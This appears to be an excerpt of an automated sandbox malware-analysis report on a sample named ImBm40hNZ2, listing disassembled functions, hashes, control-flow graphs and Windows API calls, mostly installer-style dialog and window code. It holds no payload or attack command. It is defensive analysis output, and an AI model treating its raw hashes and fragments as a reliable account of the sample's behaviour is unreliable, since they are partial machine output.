                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: fd6695a9a2080044974cf40c3e7f8c52a814da88162dca6624ae59b259a23850
                                                                                                                                                                                                                                                                • Instruction ID: f0d4a4a43c378354664553f8886553b10cf735ed5a688e27f06e2d23befaccbf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd6695a9a2080044974cf40c3e7f8c52a814da88162dca6624ae59b259a23850
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9490023130550C52E500A158491470B001587D0303F51C456B2254515DC63988957671
                                                                                                                                                                                                                                                                Function 33942ED0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 59c90a892c0dfe18c86388dd8552e2c63edbfe3d471d2524f294b39407eaf008
                                                                                                                                                                                                                                                                • Instruction ID: 999836a9829fafcd3cd142ce0282eafc9a6a18f17dca685b780999df7f9fa6d8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 59c90a892c0dfe18c86388dd8552e2c63edbfe3d471d2524f294b39407eaf008
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E3900221705108925540B16889449064015ABE1212751C566B1A88510DC56D88A96765
                                                                                                                                                                                                                                                                Function 33942EC0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: ed20d038e5c735c637aea08ca3cd986eb907f679f701dc24fce91ef7b2213aef
                                                                                                                                                                                                                                                                • Instruction ID: 78a45aee300e3ff0c8892d6a232f9e7c6edb690fefad629fddc3ad8514455780
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ed20d038e5c735c637aea08ca3cd986eb907f679f701dc24fce91ef7b2213aef
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B390023130550C52E500A1584908747001587D0303F51C456B6254515EC679C8D57631
                                                                                                                                                                                                                                                                Function 33942E00 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: c101838a8e5dbff652f21665ca788c7d968655a20037aa003d83c8c8305c3efc
                                                                                                                                                                                                                                                                • Instruction ID: 7d931a2006d4f2692f14835eabaa4cfbc62fceb20de011623f4984ac4812a5ba
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c101838a8e5dbff652f21665ca788c7d968655a20037aa003d83c8c8305c3efc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8490026130550C53E540A5584904607001587D0303F51C456B3154515ECA3D8C957235
                                                                                                                                                                                                                                                                Function 33942E50 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 5aa8bdfbd778112320b7fb494e2bcd00ce78119b6adcce0e80a47addab073b85
                                                                                                                                                                                                                                                                • Instruction ID: 30227f29dc6497afc638a271e32ee280276bfe5031b4231734469be2dce8d10c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5aa8bdfbd778112320b7fb494e2bcd00ce78119b6adcce0e80a47addab073b85
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F90026134510C92E500A1584514B060015C7E1302F51C45AF2154514DC62DCC967226
                                                                                                                                                                                                                                                                Function 33942B20 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                                                                                                • Instruction ID: cbf2ddde37432a230e1ec7466d7660ee9db19cd8af14b735b234d0989fa3ad20
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                Function 00404FBA Relevance: 54.3, APIs: 36, Instructions: 280windowclipboardmemoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 238 404fba-404fd6 239 405167-40516d 238->239 240 404fdc-4050a5 GetDlgItem * 3 call 403eb4 call 40471a GetClientRect GetSystemMetrics SendMessageA * 2 238->240 242 405197-4051a3 239->242 243 40516f-405191 GetDlgItem CreateThread CloseHandle 239->243 262 4050c3-4050c6 240->262 263 4050a7-4050c1 SendMessageA * 2 240->263 245 4051c5-4051cb 242->245 246 4051a5-4051ab 242->246 243->242 247 405220-405223 245->247 248 4051cd-4051d3 245->248 250 4051e6-4051ed call 403ee6 246->250 251 4051ad-4051c0 ShowWindow * 2 call 403eb4 246->251 247->250 256 405225-40522b 247->256 252 4051d5-4051e1 call 403e58 248->252 253 4051f9-405209 ShowWindow 248->253 259 4051f2-4051f6 250->259 251->245 252->250 260 405219-40521b call 403e58 253->260 261 40520b-405214 call 404e7c 253->261 256->250 264 40522d-405240 SendMessageA 256->264 260->247 261->260 267 4050d6-4050ed call 403e7f 262->267 268 4050c8-4050d4 SendMessageA 262->268 263->262 269 405246-405272 CreatePopupMenu call 405bb3 AppendMenuA 264->269 270 40533d-40533f 264->270 277 405123-405144 GetDlgItem SendMessageA 267->277 278 4050ef-405103 ShowWindow 267->278 268->267 275 405274-405284 GetWindowRect 269->275 276 405287-40529d TrackPopupMenu 269->276 270->259 275->276 276->270 279 4052a3-4052bd 276->279 277->270 282 40514a-405162 SendMessageA * 2 277->282 280 405112 278->280 281 405105-405110 ShowWindow 278->281 283 4052c2-4052dd SendMessageA 279->283 284 405118-40511e call 403eb4 280->284 281->284 282->270 283->283 285 4052df-4052ff OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 283->285 284->277 287 405301-405321 SendMessageA 285->287 287->287 288 405323-405337 GlobalUnlock SetClipboardData CloseClipboard 287->288 288->270
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 0040501A
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00405029
                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00405066
                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000015), ref: 0040506E
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 0040508F
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050A0
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001001,00000000,?), ref: 004050B3
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001026,00000000,?), ref: 004050C1
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001024,00000000,?), ref: 004050D4
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004050F6
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 0040510A
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040512B
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040513B
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405154
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405160
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 00405038
                                                                                                                                                                                                                                                                  • Part of subcall function 00403EB4: SendMessageA.USER32(00000028,?,00000001,00403CE5), ref: 00403EC2
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040517C
                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00004F4E,00000000), ref: 0040518A
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405191
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 004051B4
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 004051BB
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000008), ref: 00405201
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405235
                                                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 00405246
                                                                                                                                                                                                                                                                • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 0040525B
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,000000FF), ref: 0040527B
                                                                                                                                                                                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405294
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052D0
                                                                                                                                                                                                                                                                • OpenClipboard.USER32(00000000), ref: 004052E0
                                                                                                                                                                                                                                                                • EmptyClipboard.USER32 ref: 004052E6
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,?), ref: 004052EF
                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004052F9
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040530D
                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405326
                                                                                                                                                                                                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 00405331
                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 00405337
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 590372296-0
                                                                                                                                                                                                                                                                • Opcode ID: dc34fc556bad12f44983f0eb864ab1da9e583e0f341f6de52293841b1f9fa6d2
                                                                                                                                                                                                                                                                • Instruction ID: 3b51e898b73edb3ed70f647c70819dce3e7a22bfcdd564ae392b58196c58e3f7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc34fc556bad12f44983f0eb864ab1da9e583e0f341f6de52293841b1f9fa6d2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59A14871D00208BFEB21AFA0DD85AAE7F79FB04354F10417AFA01BA1A0C7755E519FA9
                                                                                                                                                                                                                                                                Function 004039AC Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 289 4039ac-4039be 290 4039c4-4039ca 289->290 291 403aff-403b0e 289->291 290->291 292 4039d0-4039d9 290->292 293 403b10-403b58 GetDlgItem * 2 call 403e7f SetClassLongA call 40140b 291->293 294 403b5d-403b72 291->294 295 4039db-4039e8 SetWindowPos 292->295 296 4039ee-4039f1 292->296 293->294 298 403bb2-403bb7 call 403ecb 294->298 299 403b74-403b77 294->299 295->296 301 4039f3-403a05 ShowWindow 296->301 302 403a0b-403a11 296->302 307 403bbc-403bd7 298->307 304 403b79-403b84 call 401389 299->304 305 403baa-403bac 299->305 301->302 308 403a13-403a28 DestroyWindow 302->308 309 403a2d-403a30 302->309 304->305 326 403b86-403ba5 SendMessageA 304->326 305->298 306 403e4c 305->306 314 403e4e-403e55 306->314 312 403be0-403be6 307->312 313 403bd9-403bdb call 40140b 307->313 315 403e29-403e2f 308->315 317 403a32-403a3e SetWindowLongA 309->317 318 403a43-403a49 309->318 322 403e0a-403e23 DestroyWindow EndDialog 312->322 323 403bec-403bf7 312->323 313->312 315->306 320 403e31-403e37 315->320 317->314 324 403aec-403afa call 403ee6 318->324 325 403a4f-403a60 GetDlgItem 318->325 320->306 328 403e39-403e42 ShowWindow 320->328 322->315 323->322 329 403bfd-403c4a call 405bb3 call 403e7f * 3 GetDlgItem 323->329 324->314 330 403a62-403a79 SendMessageA IsWindowEnabled 325->330 331 403a7f-403a82 325->331 326->314 328->306 359 403c54-403c90 ShowWindow EnableWindow call 403ea1 EnableWindow 329->359 360 403c4c-403c51 329->360 330->306 330->331 334 403a84-403a85 331->334 335 403a87-403a8a 331->335 336 403ab5-403aba call 403e58 334->336 337 403a98-403a9d 335->337 338 403a8c-403a92 335->338 336->324 340 403ad3-403ae6 SendMessageA 337->340 342 403a9f-403aa5 337->342 338->340 341 403a94-403a96 338->341 340->324 341->336 345 403aa7-403aad call 40140b 342->345 346 403abc-403ac5 call 40140b 342->346 355 403ab3 345->355 346->324 356 403ac7-403ad1 346->356 355->336 356->355 363 403c92-403c93 359->363 364 403c95 359->364 360->359 365 403c97-403cc5 GetSystemMenu EnableMenuItem SendMessageA 363->365 364->365 366 403cc7-403cd8 SendMessageA 365->366 367 403cda 365->367 368 403ce0-403d19 call 403eb4 call 405b91 lstrlenA call 405bb3 SetWindowTextA call 401389 366->368 367->368 368->307 377 403d1f-403d21 368->377 377->307 378 403d27-403d2b 377->378 379 403d4a-403d5e DestroyWindow 378->379 380 403d2d-403d33 378->380 379->315 382 403d64-403d91 CreateDialogParamA 379->382 380->306 381 403d39-403d3f 380->381 381->307 383 403d45 381->383 382->315 384 403d97-403dee call 403e7f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 382->384 383->306 384->306 389 403df0-403e08 ShowWindow call 403ecb 384->389 389->315
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039E8
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?), ref: 00403A05
                                                                                                                                                                                                                                                                • DestroyWindow.USER32 ref: 00403A19
                                                                                                                                                                                                                                                                • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A35
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00403A56
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A6A
                                                                                                                                                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403A71
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00403B1F
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00403B29
                                                                                                                                                                                                                                                                • SetClassLongA.USER32(?,000000F2,?), ref: 00403B43
                                                                                                                                                                                                                                                                • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B94
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00403C3A
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 00403C5B
                                                                                                                                                                                                                                                                • EnableWindow.USER32(?,?), ref: 00403C6D
                                                                                                                                                                                                                                                                • EnableWindow.USER32(?,?), ref: 00403C88
                                                                                                                                                                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C9E
                                                                                                                                                                                                                                                                • EnableMenuItem.USER32(00000000), ref: 00403CA5
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403CBD
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CD0
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00429820,?,00429820,0042DBA0), ref: 00403CF9
                                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,00429820), ref: 00403D08
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 00403E3C
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 184305955-0
                                                                                                                                                                                                                                                                • Opcode ID: 310d8fcbc6eabea70a8aba8d1eb49e4f8d273076e684e92c31801281a4a4f8a6
                                                                                                                                                                                                                                                                • Instruction ID: 70023f4bb34e935c1cca3693f676be707b54b1f0636591b75eec942e7e5b916a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 310d8fcbc6eabea70a8aba8d1eb49e4f8d273076e684e92c31801281a4a4f8a6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7C1B171A04200BBEB216F61ED45E2B3EACEB49706F50053EF541B21E1C779A942DB6E
                                                                                                                                                                                                                                                                Function 0040361A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 216stringregistrylibraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 392 40361a-403632 call 405ebc 395 403634-403644 call 405aef 392->395 396 403646-403677 call 405a78 392->396 404 40369a-4036c3 call 4038df call 40570f 395->404 401 403679-40368a call 405a78 396->401 402 40368f-403695 lstrcatA 396->402 401->402 402->404 410 4036c9-4036ce 404->410 411 40374a-403752 call 40570f 404->411 410->411 412 4036d0-4036f4 call 405a78 410->412 417 403760-403785 LoadImageA 411->417 418 403754-40375b call 405bb3 411->418 412->411 419 4036f6-4036f8 412->419 421 403806-40380e call 40140b 417->421 422 403787-4037b7 RegisterClassA 417->422 418->417 426 403709-403715 lstrlenA 419->426 427 4036fa-403707 call 40564c 419->427 434 403810-403813 421->434 435 403818-403823 call 4038df 421->435 423 4038d5 422->423 424 4037bd-403801 SystemParametersInfoA CreateWindowExA 422->424 431 4038d7-4038de 423->431 424->421 428 403717-403725 lstrcmpiA 426->428 429 40373d-403745 call 405621 call 405b91 426->429 427->426 428->429 433 403727-403731 GetFileAttributesA 428->433 429->411 438 403733-403735 433->438 439 403737-403738 call 405668 433->439 434->431 445 403829-403846 ShowWindow LoadLibraryA 435->445 446 4038ac-4038b4 call 404f4e 435->446 438->429 438->439 439->429 448 403848-40384d LoadLibraryA 445->448 449 40384f-403861 GetClassInfoA 445->449 453 4038b6-4038bc 446->453 454 4038ce-4038d0 call 40140b 446->454 448->449 451 403863-403873 GetClassInfoA RegisterClassA 449->451 452 403879-4038aa DialogBoxParamA call 40140b call 40356a 449->452 451->452 452->431 453->434 456 4038c2-4038c9 call 40140b 453->456 454->423 456->434
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00405EBC: GetModuleHandleA.KERNEL32(?,?,?,00403127,00000008), ref: 00405ECE
                                                                                                                                                                                                                                                                  • Part of subcall function 00405EBC: LoadLibraryA.KERNEL32(?,?,?,00403127,00000008), ref: 00405ED9
                                                                                                                                                                                                                                                                  • Part of subcall function 00405EBC: GetProcAddress.KERNEL32(00000000,?), ref: 00405EEA
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(00435000,00429820,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429820,00000000,00000006,00435400,756A3410,00434000,00000000), ref: 00403695
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(0042D340,?,?,?,0042D340,00000000,00434400,00435000,00429820,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429820,00000000,00000006,00435400), ref: 0040370A
                                                                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(?,.exe), ref: 0040371D
                                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(0042D340), ref: 00403728
                                                                                                                                                                                                                                                                • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00434400), ref: 00403771
                                                                                                                                                                                                                                                                  • Part of subcall function 00405AEF: wsprintfA.USER32 ref: 00405AFC
                                                                                                                                                                                                                                                                • RegisterClassA.USER32(0042DB40), ref: 004037AE
                                                                                                                                                                                                                                                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004037C6
                                                                                                                                                                                                                                                                • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004037FB
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403831
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(RichEd20), ref: 00403842
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(RichEd32), ref: 0040384D
                                                                                                                                                                                                                                                                • GetClassInfoA.USER32(00000000,RichEdit20A,0042DB40), ref: 0040385D
                                                                                                                                                                                                                                                                • GetClassInfoA.USER32(00000000,RichEdit,0042DB40), ref: 0040386A
                                                                                                                                                                                                                                                                • RegisterClassA.USER32(0042DB40), ref: 00403873
                                                                                                                                                                                                                                                                • DialogBoxParamA.USER32(?,00000000,004039AC,00000000), ref: 00403892
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                • API String ID: 914957316-2904746566
                                                                                                                                                                                                                                                                • Opcode ID: 3261aa810d1dd6b7c581231881c95c7173fed056fd42999ef2631fafeb1d8368
                                                                                                                                                                                                                                                                • Instruction ID: d178aa451f166566eaf2c3163fe56623853c288c4747cf6087cde58c0eecb14b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3261aa810d1dd6b7c581231881c95c7173fed056fd42999ef2631fafeb1d8368
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2961B4B1B442406ED620AF629C45F273EACE745749F40457EF904B72E1C77DAD02CA2D
                                                                                                                                                                                                                                                                Function 00403FC8 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 205windowstringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
